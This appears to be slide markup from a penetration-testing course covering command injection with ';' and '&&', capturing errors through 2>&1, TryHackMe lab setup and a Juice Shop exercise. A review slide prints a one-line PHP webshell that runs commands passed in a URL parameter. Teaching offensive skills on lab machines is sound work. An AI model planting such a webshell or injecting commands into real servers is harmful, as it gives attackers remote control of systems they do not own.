            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whether or not certain packages are installed</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration information</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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9" name="Shape 1299"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p91"/>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24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Commands injected with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> generated no output when they encountered errors. This is because the application only dumps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to the page—</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>However, we can redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>2&gt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p9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6" name="Shape 1046"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p5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48" name="Google Shape;1048;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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Webshell Warm-Up</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5" name="Shape 1305"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p9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07" name="Google Shape;1307;p92"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extracting Errors</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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1" name="Shape 1311"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1312" name="Google Shape;1312;p93"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1313" name="Google Shape;1313;p9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14" name="Google Shape;1314;p93"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Extracting Error and Injecting Code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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use 2&gt;&amp;1 to create a template payload and collect additional information from the serve.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rPr lang="en"/>
              <a:t>Instructions sent via Slack.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8" name="Shape 1318"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1319" name="Google Shape;1319;p9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20" name="Google Shape;1320;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Errors </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Injecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Code</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4" name="Shape 1324"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1325" name="Google Shape;1325;p9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Tryhackme Set Up</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1326" name="Google Shape;1326;p9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0" name="Shape 1330"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p96"/>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will hack into a vulnerable machine through a website called tryhackme.com.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1332" name="Google Shape;1332;p9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6" name="Shape 1336"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1337" name="Google Shape;1337;p9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Tryhackme.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1338" name="Google Shape;1338;p9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a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tryhackme.com has different VM's to test your hacking skills, some are free while others require a paid subscription.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p9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40" name="Google Shape;1340;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1682350"/>
            <a:ext cx="9144000" cy="2493000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hosts their VMs on their own servers. Therefore, we do not have to worry about our RAM or storage space being taken up when we want to hack a machine.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, because it is unsafe to host vulnerable machine's on the internet, we'll need to set up an account and a VPN in order to access their vulnerable machines.</a:t>
            </a:r>
            <a:endParaRPr sz="18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4" name="Shape 1344"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345" name="Google Shape;1345;p9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46" name="Google Shape;1346;p98"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setting up VPN for tryhackme</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C232"/>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0" name="Shape 1350"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p99"/>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1352" name="Google Shape;1352;p9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53" name="Google Shape;1353;p99"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Juice It for All its Worth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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will play the role of a penetration tester asked with completing a list of duties that require using  the skills we’ve learned throughout the week.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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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7" name="Shape 1357"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1358" name="Google Shape;1358;p10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59" name="Google Shape;1359;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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Juice It for All Its Worth</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3" name="Shape 1363"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1365" name="Google Shape;1365;p10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Locate the Score Board</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1366" name="Google Shape;1366;p10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2" name="Shape 1052"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;p5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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Google Shape;1054;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="14106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Suppose the following PHP webshell lives at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php</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400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>"command"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
